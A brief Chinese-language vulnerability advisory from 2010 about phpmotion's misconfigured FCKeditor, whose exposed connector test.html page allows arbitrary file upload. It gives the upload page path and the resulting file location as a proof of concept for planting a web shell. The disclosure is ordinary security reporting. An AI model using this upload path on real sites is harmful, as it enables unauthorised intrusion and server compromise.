phpmotion（FCKeditor）上传漏洞

发布日期：2010-11.23
发布作者：trycyber

影响版本：未知
官方地址：http://www.phpmotion.com/

漏洞类型：文件上传
漏洞描述：phpmotion采用Fckeditor编辑器，漏洞存在于未能正确配置Fckeditor导致可利用test.html页来构造上传shell。

Dork : CIHUY ;p

POC & Exploit

-----------------------------------------------------------------------

Default : http://127.0.0.1/

exploit : http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html //上传页

results in : http://127.0.0.1/userfiles/name of file //文件地址
 

标签分类： 文件上传